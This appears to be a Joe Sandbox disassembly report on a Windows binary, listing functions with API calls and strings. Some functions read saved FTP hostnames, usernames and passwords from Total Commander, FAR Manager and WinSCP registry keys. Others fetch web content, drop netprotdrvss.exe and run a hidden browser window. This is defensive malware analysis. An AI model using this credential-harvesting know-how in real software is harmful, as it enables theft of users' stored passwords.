Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: ForegroundWindow$CreateInstance
String ID:
API String ID: 2498160819-0
Opcode ID: 82b24d427a4319f76012a439117db5c4ff365e6f2f98325e2b41cf4565e173f1
Instruction ID: 3fc8f4a2167e7ffe653cafe2f971d35c6ed40139ecea7ac55ee7c5b8babae7fd
Opcode Fuzzy Hash: 82b24d427a4319f76012a439117db5c4ff365e6f2f98325e2b41cf4565e173f1
Instruction Fuzzy Hash: E8F03C71640208FFD7049FA6CD8DC5ABBFCEF9970172009AAF101EB290D6755950DA25

Uniqueness

Uniqueness Score: -1.00%

Function 00406CB5 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00406CCF

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 55562b46774a615dc2e97dfe1c8d2773bede11335cf8e3c3be8baa064d73f36a
Instruction ID: 5612040357c07126fa19026aaffe8c4f09115318cb9d2fe7a616e1c4ae3a2977
Opcode Fuzzy Hash: 55562b46774a615dc2e97dfe1c8d2773bede11335cf8e3c3be8baa064d73f36a
Instruction Fuzzy Hash: C9E04FB2D4011D5BDB1C9B60EE47BD9BBF8EB11304F0140E6D746E5180E6B8DB848F95

Uniqueness

Uniqueness Score: -1.00%

Function 0040B51C Relevance: .7, Instructions: 666COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a180277a47174503745c50212eccdbe59cf0734582742268f170c434fce9886
Instruction ID: 218ff2483168da8b183dc8d255f139c90e55d0551e3cd34b08f9c15d5f680e8f
Opcode Fuzzy Hash: 6a180277a47174503745c50212eccdbe59cf0734582742268f170c434fce9886
Instruction Fuzzy Hash: FB423CB6E413099FDB08CFD6D8C09DCB7B3FFD8314B1A91A9C505A7316D6B87A068A50

Uniqueness

Uniqueness Score: -1.00%

Function 00402E3E Relevance: 26.6, APIs: 5, Strings: 10, Instructions: 309
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004058FB: _memset.LIBCMT ref: 0040591C

GetModuleFileNameW.KERNEL32(00000000,00420840,00001000), ref: 00402EC3
GetCurrentDirectoryW.KERNEL32(00001000,00420840), ref: 00402EDC
GetLastError.KERNEL32(?), ref: 00402F4E
GetLastError.KERNEL32 ref: 00403237
GetLastError.KERNEL32(?), ref: 00403258

Strings

file, xrefs: 0040300F
^key=, xrefs: 0040305E
Via: , xrefs: 004030ED
none, xrefs: 00402F16
^client=, xrefs: 0040301A
8@, xrefs: 00402FBA
8@, xrefs: 004031AC
.html, xrefs: 00402FFE, 004031EE
From: , xrefs: 004030C8
4@, xrefs: 00402EF1

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: ErrorLast$CurrentDirectoryFileModuleName_memset
String ID: .html$4@$8@$8@$From: $Via: $^client=$^key=$file$none
API String ID: 2247176544-2288798624
Opcode ID: 9ae992922a2ad1b825f1490aaeac56172bb5fbdf92c9f9a8e97600dc8421b205
Instruction ID: 295a2e83bb6b363340795eecc9968ea2d400926a6410b4e4a91bd94f8c6abde8
Opcode Fuzzy Hash: 9ae992922a2ad1b825f1490aaeac56172bb5fbdf92c9f9a8e97600dc8421b205
Instruction Fuzzy Hash: 01B17E72A001199BCB24EF61CD91AEB77A9EF44304F4040BFF519E7291EA389A858F59

Uniqueness

Uniqueness Score: -1.00%

Function 0040B096 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 181
threadnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,00420840,00001000,00000000,00000000,00000000,?,0040B320,00000000,?,0040B3E0), ref: 0040B103
InternetSetPerSiteCookieDecisionW.WININET(begun.ru,00000005), ref: 0040B16F
GetLastError.KERNEL32(00000004,?,0040B320,00000000,?,0040B3E0), ref: 0040B188
CreateThread.KERNEL32(00000000,00000000,Function_0000B023,?,00000000,00000000), ref: 0040B1C3

Strings

\netprotdrvss.exe, xrefs: 0040B12D, 0040B293
begun.ru, xrefs: 0040B16A

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: CookieCreateDecisionErrorFileInternetLastModuleNameSiteThread
String ID: \netprotdrvss.exe$begun.ru
API String ID: 2887986221-2660752650
Opcode ID: ad6e69e745eb0134cfaa1d61605679bf99b5aa58cc3a10e76cbc4c8091dfe4a8
Instruction ID: dc85dbecd2d93a1c92e95c54703b850062b4355e184197ecdf44903e32880826
Opcode Fuzzy Hash: ad6e69e745eb0134cfaa1d61605679bf99b5aa58cc3a10e76cbc4c8091dfe4a8
Instruction Fuzzy Hash: 4351F571A00218BBEB206F65DC89AAF3769EB44349F00447BF904BA1D1D77C8D51CBAE

Uniqueness

Uniqueness Score: -1.00%

Function 00403C10 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 173
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403C84

Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403ACF
Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403AE4
Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF

PathRemoveFileSpecW.SHLWAPI(?), ref: 00403CA3

Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00403D2C
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403DDF

Strings

*ghisler*, xrefs: 00403CD8
installdir, xrefs: 00403DA1
*total*commander*, xrefs: 00403CC9
$, xrefs: 00403CF9
#, xrefs: 00403D0E
SOFTWARE\Ghisler\Total Commander, xrefs: 00403C2F
ftpininame, xrefs: 00403C41
&, xrefs: 00403D07
*totalcmd*, xrefs: 00403CB7

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: Heap$AllocEnvironmentExpandPathPrivateProfileStringStrings$FileFolderFreeOpenRemoveSpec
String ID: #$$$&$*ghisler*$*total*commander*$*totalcmd*$SOFTWARE\Ghisler\Total Commander$ftpininame$installdir
API String ID: 2046068145-3914982127
Opcode ID: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
Instruction ID: e3ad36e3959a395177e0e2b587ea9ce0600459653a05a841f57562a17ae86195
Opcode Fuzzy Hash: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
Instruction Fuzzy Hash: AF516D72D0010CABDB10DAA1DC85FDF77BCEB44305F1044BBE515F2181EA789B898B65

Uniqueness

Uniqueness Score: -1.00%

Function 004027E6 Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 355
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 004027F5

Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551

Strings

From: true, xrefs: 00402827

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: Internet$InitializeOpenOption
String ID: From: true
API String ID: 1176259655-9585188
Opcode ID: 97ee820607911564f81d2c28c98cc723bebeae55605858c30cb2ec0cfeb5fbf8
Instruction ID: 80b93d55993982ee294e6d3758cd093c071ceb3c0ab782597868a4ea0391af47
Opcode Fuzzy Hash: 97ee820607911564f81d2c28c98cc723bebeae55605858c30cb2ec0cfeb5fbf8
Instruction Fuzzy Hash: 89C1E371E00219AFDF20AFA5CD49A9E77B5AB04304F10447BF814B32D2D6B89D41CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004041E4 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 210
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32(00000008,00000C0C), ref: 004041FD
RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,00000008), ref: 004042B3
RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00404373
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404419
RegCloseKey.ADVAPI32(?), ref: 0040442A

Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D

Strings

username, xrefs: 00404266
SOFTWARE\Far2\Plugins\ftp\hosts, xrefs: 0040422A
password, xrefs: 00404282
SOFTWARE\Far\Plugins\ftp\hosts, xrefs: 00404219
user, xrefs: 00404274
ftp://%s:%s@%s, xrefs: 004043B7
hostname, xrefs: 00404258

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: HeapOpen$AllocCloseEnumFree
String ID: SOFTWARE\Far2\Plugins\ftp\hosts$SOFTWARE\Far\Plugins\ftp\hosts$ftp://%s:%s@%s$hostname$password$user$username
API String ID: 416369273-4007225339
Opcode ID: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
Instruction ID: d928ca8cdb490927e602bcc25cbe761e1e9ca2c88fd961b6a2cac4e28df6e2a2
Opcode Fuzzy Hash: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
Instruction Fuzzy Hash: CF717DB2900118ABCB20EB95CD45EEFBBBDEF48314F10457BF615F2181EA349A458B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040451B Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 205registrymemoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000008,00000C20,?,00000000,00000008), ref: 00404542
RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 004045DA
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404605
RegCloseKey.ADVAPI32(?), ref: 0040476D

Strings

username, xrefs: 004045A2
SOFTWARE\martin prikryl\winscp 2\sessions, xrefs: 0040456A
password, xrefs: 004045B0
hostname, xrefs: 00404586
ftp://%s:%s@%s:%u, xrefs: 004046F3
portnumber, xrefs: 00404594

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: AllocCloseEnumHeapOpen
String ID: SOFTWARE\martin prikryl\winscp 2\sessions$ftp://%s:%s@%s:%u$hostname$password$portnumber$username
API String ID: 3497950970-285550827
Opcode ID: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
Instruction ID: 619369561540f7679ee4dce6ffb5b1aea82e2176e3673c83278f81db5409ea06
Opcode Fuzzy Hash: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
Instruction Fuzzy Hash: AE715DB2900119AFDB10DBD5CD81AEF77BCEB48308F10447AE605F3291EB389E458B68

Uniqueness

Uniqueness Score: -1.00%

Function 00409C99 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 127memorynetworkfileCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,hOA,?,00000000,04400000,00000000), ref: 00409CCB
GetProcessHeap.KERNEL32(00000000,00002001,?,?,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF4
HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF7
InternetReadFile.WININET(?,?,00001000,?), ref: 00409D6E
GetProcessHeap.KERNEL32(00000000,00000002,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D80
HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D83
GetProcessHeap.KERNEL32(00000000,00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE3
HeapFree.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE6

Strings

hOA, xrefs: 00409CC5

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: Heap$Process$AllocInternet$FileFreeOpenRead
String ID: hOA
API String ID: 1355009786-3485425990
Opcode ID: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
Instruction ID: 638041e7f74e2b46c75c1535d5ef76f15aa532bf5b3977fbb34850ab96fc5943
Opcode Fuzzy Hash: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
Instruction Fuzzy Hash: 1B418B71900209FFEB119F65C844BAA7BA9FF44355F14847AF819E6292E778CE80CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406E69 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 130COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00406E78

Strings

^key=, xrefs: 00406F2E
8@, xrefs: 00406ED2
^nocrypt, xrefs: 00406F5C
Via: , xrefs: 00406FAF
hOA, xrefs: 00406E7E
.html, xrefs: 00406F14
Page generated at: , xrefs: 00407000
From: , xrefs: 00406F8E
0, xrefs: 00406EF5

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: CountTick
String ID: .html$0$8@$From: $Page generated at: $Via: $^key=$^nocrypt$hOA
API String ID: 536389180-1762329985
Opcode ID: 84a0e12b251b3718d34eddf76b775ad89a92ce41e4fff3615f2568cd6720db27
Instruction ID: 73e0daeea7a9f5f4b783dd0519eebdf5205f1bdf48cad4214514e0173d2ce6b9
Opcode Fuzzy Hash: 84a0e12b251b3718d34eddf76b775ad89a92ce41e4fff3615f2568cd6720db27
Instruction Fuzzy Hash: 27416131A0161997CB25EBA2DC51BDE7369FF44308F0044BFB909B71C1EA78AE948F59

Uniqueness

Uniqueness Score: -1.00%

Function 00409301 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

CharLowerW.USER32(?,?,?,?,?,?,+@,004089CD,?,?,?), ref: 0040933E
SysFreeString.OLEAUT32(?), ref: 00409359
SysFreeString.OLEAUT32(?), ref: 00409362
SysAllocString.OLEAUT32(?), ref: 004093B8
SysAllocString.OLEAUT32(javascript), ref: 004093C1
SysFreeString.OLEAUT32(00000000), ref: 004093E3
SysFreeString.OLEAUT32(00000000), ref: 004093E6

Strings

http:, xrefs: 00409347
javascript, xrefs: 004093BA
+@, xrefs: 00409301

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: String$Free$Alloc$CharLower
String ID: http:$javascript$+@
API String ID: 1987340527-3375436608
Opcode ID: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
Instruction ID: 0b4048b57b081e67726dd44363989906ad2532c65c6ed0c60c908aefe346602b
Opcode Fuzzy Hash: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
Instruction Fuzzy Hash: 6A310A71A00119AFDB04DFA6C889EAEB7B8EF48314B144469E805EB291D775AD41CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00405229 Relevance: 16.6, APIs: 3, Strings: 8, Instructions: 134sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00002710), ref: 00405366
Sleep.KERNEL32(00009C40), ref: 00405383
Sleep.KERNEL32(00004E20), ref: 004053D0

Strings

^key=, xrefs: 004052D0
8@, xrefs: 00405275
Via: , xrefs: 0040533C
CsM, xrefs: 004053B2
ftp, xrefs: 004052C5
.html, xrefs: 004052B4
From: , xrefs: 00405318
hOA, xrefs: 00405305

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: Sleep
String ID: .html$8@$CsM$From: $Via: $^key=$ftp$hOA
API String ID: 3472027048-1081452883
Opcode ID: 74b6ecad85d8563e453e52ab39e53749c12d05251352443c8ee161ef9de2affd
Instruction ID: 3376cbd9a830c5581772f61034da1910d267ee329a165acd0f4726bddbbbde03
Opcode Fuzzy Hash: 74b6ecad85d8563e453e52ab39e53749c12d05251352443c8ee161ef9de2affd
Instruction Fuzzy Hash: 4E419431A0091887CB24E7A29D529EF73A9EF40318F54407FE905B71D1EA7C9E898F5D

Uniqueness

Uniqueness Score: -1.00%

Function 00408CB7 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 239COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(00000016), ref: 00408E7A

Strings

_self, xrefs: 00408ED5
http, xrefs: 00408E1A
+@, xrefs: 00408CB7

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: ClearVariant
String ID: _self$http$+@
API String ID: 1473721057-3317424838
Opcode ID: 318762bed40dfdc809c59a68404d151adbfac834f26e4a68fdc08c116542e79f
Instruction ID: ae9540e34d1dd6ebd4224328a85202065bb39baa52f6123ff81f2465f468f74f
Opcode Fuzzy Hash: 318762bed40dfdc809c59a68404d151adbfac834f26e4a68fdc08c116542e79f
Instruction Fuzzy Hash: 6C913D75A00209EFDB00DFA5C988DAEB7B9FF88305B144569E845FB290DB359D41CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00406ADF Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 136registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A

Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED

RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182,?,0040B320,00000000), ref: 00406B8C
RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406C17

Strings

SOFTWARE\Classes\MIME\Database\Content Type\, xrefs: 00406AF6, 00406B5D, 00406BE8
text/javascript, xrefs: 00406BF3
CLSID, xrefs: 00406B3B, 00406B40, 00406B9D, 00406BB5, 00406C28, 00406C40
application/x-javascript, xrefs: 00406B68
text/html, xrefs: 00406B01

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: Open$CloseQueryValue
String ID: CLSID$SOFTWARE\Classes\MIME\Database\Content Type\$application/x-javascript$text/html$text/javascript
API String ID: 3546245721-1332223170
Opcode ID: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
Instruction ID: b356448af2dda310db5a41c348b39e69e2b2ee30590ea213815e442ef4722270
Opcode Fuzzy Hash: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
Instruction Fuzzy Hash: 0A4142B2650118AAEB10D6519E81BEB73FCEB44309F1144BBE705F2080FB789F598F69

Uniqueness

Uniqueness Score: -1.00%

Function 0040A156 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(eventConn), ref: 0040A18D
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040A1D4
SetParent.USER32(00000000,00000000), ref: 0040A1E2
GetWindowLongW.USER32(00000000,000000EC), ref: 0040A1ED
SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 0040A1FE
SetWindowPos.USER32(00000000,00000001,00001388,00001388,00000010,?,00000000), ref: 0040A21E

Part of subcall function 0040A0B5: CoInitialize.OLE32(00000000), ref: 0040A0C0
Part of subcall function 0040A0B5: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
Part of subcall function 0040A0B5: CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3

Strings

Shell_TrayWnd, xrefs: 0040A1CF
eventConn, xrefs: 0040A188

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: Window$Long$AllocCreateFindHandleInitializeModuleParentString
String ID: Shell_TrayWnd$eventConn
API String ID: 2141107913-3455059086
Opcode ID: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
Instruction ID: 39c15930e577ecb7297998fc23ff8408fdcdb7101606cb16b0d9d8475b405f16
Opcode Fuzzy Hash: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
Instruction Fuzzy Hash: 05216834900214EFDB10AFA4CD89FAB7BB9EF0A311F2046B5F901EA2A1C7755D54CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004047CC Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 226memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C

HeapAlloc.KERNEL32(00000008,00000626), ref: 00404888
StrStrIA.SHLWAPI(?,?), ref: 00404913
StrStrIA.SHLWAPI(?,?), ref: 00404925
StrStrIA.SHLWAPI(?,?), ref: 00404935
StrStrIA.SHLWAPI(?,?), ref: 00404947

Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
